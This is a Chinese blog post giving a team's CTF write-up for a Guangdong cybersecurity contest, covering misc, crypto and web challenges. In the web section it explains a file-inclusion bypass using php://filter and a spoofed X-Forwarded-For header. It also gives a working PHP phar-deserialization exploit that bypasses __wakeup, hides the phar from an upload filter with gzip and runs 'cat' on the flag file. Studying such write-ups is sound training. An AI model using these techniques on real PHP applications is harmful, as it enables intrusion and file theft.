广东省网络安全竞赛部分web,misc wp

已于 2024-05-13 08:53:46 修改
阅读量1.1k 收藏 25
点赞数 18
分类专栏: wp 文章标签: web安全 学习
于 2024-05-13 08:22:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/oyf3085227433/article/details/138782642
版权

我的队伍只做了5题,还是太菜了,本来不想发的,但是写都写了,还是水一篇博客吧

这里是我们队的wp

misc1

给了一个压缩包,解压需要密码,用纯数字密码没跑出来,感觉可能不是要强跑,看了下压缩包文件名,好长而且是32位,感觉是MD5,拿去网站查一下就出了

在这里插入图片描述

解压后发现flag.png打不开,用010发现是png文件头损坏,修复为

89 50 4E 47

打开图片发现是二维码,扫描发现

❀❁❀❇❀✼❀❂✿❆✿✽❁❀✿✾❂❅✿❄❂❉❀✿❂❆❀❃❀✿❂❆✿❀❁✾✻✿❁❁❀❁❂❊✻❂✿❈=

花瓣=朵编码,在线解码即可,https://www.qqxiuzi.cn/bianma/wenbenjiami.php?s=huaduo

flag{rUsJyNdKhdKuS4VfO7}

misc2

给了个图片

在这里插入图片描述

定积分算出来是Π,没啥头绪,用010看了看图片发现

在这里插入图片描述

很明显用stegpy工具,但是不知道密钥,推测是Π的前6位,一开始试314159,错了,又试了Π/6的前6位,又错

后面经队友提醒,发现密钥3.1415,真是逆天,小数点也在密钥里,接出来

3557736c7371495153424738633644326d352f4b5277672b36676a6d3174723144513855794a556d495a733dk:luckyone

把3557736c7371495153424738633644326d352f4b5277672b36676a6d3174723144513855794a556d495a733d十六进制编码了一下为

5WslsqIQSBG8c6D2m5/KRwg+6gjm1tr1DQ8UyJUmIZs=

密钥是luckone,试了好多各种带密钥的解密,后面尝试des的PKSC37填充,iv,密钥都是luckyone,就出了

在这里插入图片描述

crypto

密码学就一个题目,简单的rsa加密,很多参数都给了,直接按照加密脚本,对应解密即可

from Crypto.Util.number import getPrime, long_to_bytes
from Crypto.Util.strxor import strxor
from Crypto.PublicKey import RSA
d = 4885628697024674802233453512637565599092248491488767824821990279922756927662223348312748794983451796542248787267207054348962258716585568185354414099671493917947012747791554070655258925730967322717771647407982984792632771150018212620323323635510053326184087327891569331050475507897640403090397521797022070233
N = 89714050971394259600440975863751229102748301873549839432714703551498380713981264101533375672970154214062583012365073892089644031804109941766201243163398926438698369735588338279544152140859123834763870759757751944228350552806429642516747541162527058800402619575257179607422628877017180197777983487523142664487
ciphertext = 67254133265602132458415338912590207677514059205474875492945840960242620760650527587490927820914970400738307536068560894182603885331513473363314148815933001614692570010664750071300871546575845539616570277302220914885734071483970427419582877989670767595897758329863040523037547687185382294469780732905652150451

m = pow(ciphertext,d,N)
xor_key = long_to_bytes(m)
key = b'Life is like an ocean only strong-minded can reach the other shore'
key = key[:len(xor_key)]
msg = strxor(key,xor_key)
print(msg)

web_1

题目提示是文件包含,一开始进去就是Access deny,没有权限,可能需要本地登录,加个XFF头就会显示,file is null
在这里插入图片描述
尝试传file参数来进行文件包含,但是ban了很多关键字,用只有php://filter时没有被ban,但是加上read或write都会被拦截,但是不加又没有回显,尝试把read=convert.base64-encodebase64一下就能回显了文件,然后读取flag即可
在这里插入图片描述

web_3

题目提示有源码,用dirsearch扫一下,发现有www.tar.gz,下载后发现了源码,关键如下

download.php

<?php

$file = $_POST['file'];

if (isset($_POST['file'])) {
    if (preg_match("/flag/", $file)) {
        die("Access Denied");
    }
    
    $forbidden_paths = array("/etc/");
    foreach ($forbidden_paths as $forbidden_path) {
        if (strpos($file, $forbidden_path) === 0) {
            die("Access Denied");
        }
    }

    if (strpos($file, '../') !== false || strpos($file, '..\\') !== false) {
        die("Access Denied");
    }

    echo file_get_contents($file);
}

class File {
    public $val1;
    public $val2;
    public $val3;

    public function __construct() {
        $this->val1 = "val1";
        $this->val2 = "val2";
    }

    public function __destruct() {
        if ($this->val1 === "file" && $this->val2 === "exists") {
            if (preg_match('/^\s*system\s*\(\s*\'cat\s+\/[^;]*\'\s*\);\s*$/', $this->val3)) {
                eval($this->val3);
            } else {
                echo "Access Denied";
            }
        }
    }

    public function __access() {
        $Var = "Access Denied";
        echo $Var;
    }

    public function __wakeup() {
        $this->val1 = "exists";
        $this->val2 = "file";
        echo "文件存在";
    }
}

?>

upload.php

<?php
if ($_FILES["file"]["error"] > 0){
    echo "文件上传出错";
}
else{
    $extensions = array("gif", "jpg", "png");
    $temp = explode(".", $_FILES["file"]["name"]);
    $fileExtension = end($temp);
    $fileSizeCheck = $_FILES["file"]["size"];
    $isExtensionAllowed = in_array($fileExtension, $extensions) ? true : false;
    if ($fileSizeCheck && $isExtensionAllowed){
        $fileContent = file_get_contents($_FILES["file"]["tmp_name"]);
        $haltCompilerCheck = strpos($fileContent, "__HALT_COMPILER();");
        if(gettype($haltCompilerCheck) === "integer"){
            echo "phar";
        }else{
            if (file_exists("./upload/" . $_FILES["file"]["name"])){
                echo $_FILES["file"]["name"] . " 文件已经存在";
            }else{
                $fileHandle = fopen("./upload/".$_FILES["file"]["name"], "w");
                fwrite($fileHandle, $fileContent);
                fclose($fileHandle);
                echo "上传成功 ./upload/".$_FILES["file"]["name"];
            }
        }
    }else{
        echo "不允许上传 .".$fileExtension;
    }
}

function obfuscateCode($code) {
    $a = strrev($code);
    $b = base64_encode($a);
    return $b;
}

function deobfuscateCode($code) {
    $a = base64_decode($code);
    $b = strrev($a);
    return $b;
}

obfuscateCode($_SERVER["PHP_SELF"]);

?>

然后还有一个文件上传的页面
要利用File类的__destruct方法读取flag

download.php,有file_get_contents,可以post一个file参数用phar协议,触发phar反序列化

但是有__wakeup需要绕过,发现php版本为5.5,修改系列化字符传属性数字即可

upload.php检测了phar文件特征__HALT_COMPILER();,gzip压缩或者写入zip注释,我这里用gzip压缩

然后正则比较奇葩,不能有flag,命令要是system(cat ..);类似的,

exp如下:

<?php
class File {
    public $val1;
    public $val2;
    public $val3;
}

$a= new File();
$a->val1='file';
$a->val2='exists';
$a->val3="system('cat /f*');";
$phar=new Phar("test.phar");
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER();?>");
$phar->setMetadata($a);
$phar->addFromString("a.txt","a");
$phar->stopBuffering();

?>

生成phar文件后,要用16进制修改器修改表示属性个数的16进制值,否则脚本重签名会失败

在这里插入图片描述
改完后再用脚本重签名,然后gzip压缩,最后改个png后缀在上传页面传上去后,在download.php传

?file=compress.zlib://phar://newtest.png/a.txt

读取phar文件,触发phar反序列化
在这里插入图片描述

竹言笙熙
关注
  • 18
    点赞
  • 25
    收藏
    觉得还不错? 一键收藏
  • 7
    评论
专栏目录
第三届广东大学生网络安全攻防竞赛encipher
weixin_65204980的博客
05-16 310
2.在解密过程中,我们实际上不需要获取 key 的值,而是需要使用相同的过程来生成 key。在加密过程中,我们是根据输入消息的长度从固定字符串中截取与消息长度相同的部分作为 key。由于明文 m 是通过异或密钥 key 进行异或操作得到的,我们可以得到 key 的长度。然后,我们可以使用 key 的长度从固定字符串中截取相应长度的部分作为 key。所以,我们需要使用解密后的明文的长度来截取固定字符串中相应长度的部分作为 key。接着,我们可以将 key 与解密后的明文 m 进行异或操作,得到原始消息。
2023浙江省大学生信息安全竞赛初赛misc方向wp
toto的博客
11-04 2099
但这样子恢复出来的图像有点问题卡了很久,后来发现有几个点原像素的频率值比背景(211,211,211)的频率还高。每个文字基本上RGB差不多,盲猜是把原图每个像素替换成一个文字了,测量后每个文字所在正方形为16*16。绝大多数情况下背景频率最高,原像素就是频率第二高的RGB值,直接选取sorted_dict[1]即可。简单读取一个16*16正方形的像素后发现由于图片压缩导致部分文字像素有渐进,同时可以看出背景像素为。得到的flag.txt很明显是摩斯,连变量名都对应好了,DASH替换为。
第五届浙江省网络与信息安全竞赛部分WP
hahaHalsey的博客
09-18 879
后续再补充
第五届浙江省网络安全竞赛预赛部分wp
qq_45406119的博客
09-24 1208
400分,4道
第五届浙江省大学生网络与信息安全竞赛预赛 部分WP
weixin_46356548的博客
09-17 2151
第五届浙江省大学生网络与信息安全竞赛-技能挑战赛 预赛 部分WP
2022年新疆天山固网杯网络安全技能竞赛wp
onl_llo的博客
07-04 3802
天山固网杯wp
第五届浙江省大学生网络与信息安全竞赛-技能挑战赛WP
http://www.lunatic007.top/
09-18 2389
第五届浙江省大学生网络与信息安全竞赛-技能挑战赛WP
鹤城杯杂项MISC部分WP
TenG的博客
10-09 2658
Preface 昨天的比赛又一次见识到了大师傅们多么厉害,疯狂上分,可怜如我,只做出了四个杂项。趁着比赛刚过就写下WP,也会去看下其他师傅的WP学习下,文中有我理解错误的思路烦请师傅们多多指教 Process NEW_MISC 下载附件以后就是一个PDF 最开始我还以为有隐藏文件啥的,分离了下啥也没有。然后又换思路,开始看下PDF内容,发现这个单词表以后还以为是文章对应单词转换字母得出flag(不知道有没有师傅们跟我一样),看了好久以后都没找到这个表里面的单词,甚至还用百度翻译看了部分内容哈哈哈哈哈。然后发
第一届东软杯网络CTF竞赛-DNUICTF部分wp
weixin_52829570的博客
12-06 3570
MISC [签到]签到 直接提交flag即可 flag:flag{Dnui_ctf_2021_s1gn_in} [萌新]在哪呢 ctrl+a全选发现有个空白的地方被选中了 在kali打开选中,拿到flag flag:flag{hey_there_is_no_thing} 只是个PNG,别想太多了.png binwalk命令查看png图片:binwalk -e PNG.png,发现flag flag:flag{zhe_ti_mu_ye_tai_bt_le_XD}
2022年广东省网络安全技能大赛-信息探索环境
06-21
2022年广东省网络安全技能大赛-信息探索环境(misc
第三届广东省大学生网络安全攻防大赛新手备赛cry-misc
05-28
共同学习一起进步。里面有博主自己刷的misc杂项、密码学题目与解题过程,虽新手但也尽可能做到过程详细讲解了。放在这里有需要的就下载,我也当作第一次参加这个比赛的回忆。
中国电信2023巅峰极客网络安全技能挑战赛的一道Misc题目
07-22
中国电信2023巅峰极客网络安全技能挑战赛的一道Misc题目
2022年网络安全中山市香山杯misc题目附件
11-01
2022年网络安全中山市香山杯misc题目附件
基于网络安全技术的CTF竞赛.pdf
09-19
CTF竞赛的类型有很多,如网络安全、应用程序安全、移动安全等挑战类型,CTF竞赛的题型主要有 Web、Reverse Engineering、Pwn、Crypto、Ppc 及 Misc 等。CTF竞赛的益处包括:提高了参赛选手的技术水平,提高了网络...
FairGuard游戏加固入选《嘶吼2024网络安全产业图谱》
FairGuard手游加固(企业官方博客)
07-19 341
FairGuard游戏加固作为游戏安全行业领先的第三方服务商,凭借技术创新、产品服务及市场反馈等多方面优异表现获得业界认可,实力入选移动应用安全细分领域。
网络安全】CrowdStrike 的 Falcon Sensor 软件导致 Linux 内核崩溃
最新发布
par@ish的博客
07-22 739
CrowdStrike的Falcon Sensor软件,上周导致大量Windows电脑出现蓝屏故障,现在还被发现Linux内核系统崩溃也与CrowdStrike有关。六月份,Red Hat警告其客户在使用版本为5.14.0-427.13.1.el9_4.x86_64的内核启动后,由Falcon Sensor进程引发的“Kernel panic”问题,影响了部分Red Hat Enterprise Linux 9.4用户。
网站验证:确保网络安全与信任的重要步骤
07-22 139
在数字时代,网站验证是确保网络安全和建立用户信任的关键措施。随着网络诈骗和恶意软件的日益增多,验证网站的真实性和安全性变得尤为重要。本文将探讨网站验证的重要性、常见的验证方法以及如何通过验证提升用户体验和网站信誉。
工业互联网安全misc wp
10-27
工业互联网安全是指保护工业互联网系统免受各类恶意攻击和数据泄露的安全措施。随着工业互联网的快速发展,工业互联网安全问题日益突出,需要采取有效措施确保系统的可靠性和稳定性。 首先,工业互联网安全需要进行系统漏洞的识别和修复。通过对系统进行全面的安全漏洞扫描,及时修复已知漏洞,避免黑客利用安全漏洞对系统进行攻击。 其次,建立严格的访问控制机制也是工业互联网安全的重要环节。只允许经过认证的用户访问系统,并设置不同权限的用户角色,确保只有授权的用户才能进行相关操作,避免未经授权的用户对系统进行恶意操作。 此外,工业互联网安全还需要进行实时的威胁监测和入侵检测。通过监测系统流量、事件日志和用户行为等信息,及时发现潜在风险和入侵行为,采取及时的应对措施,避免系统被攻击或数据泄露。 最后,定期进行系统备份和恢复也是保障工业互联网安全的重要手段。定期备份系统数据,并制定完善的恢复计划,以免系统故障或攻击导致数据丢失或恢复困难。 综上所述,工业互联网安全是保护工业互联网系统安全的重要措施,需要进行系统漏洞修复、访问控制、实时威胁监测和入侵检测以及系统备份和恢复等多方面的工作,确保系统运行的安全可靠。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值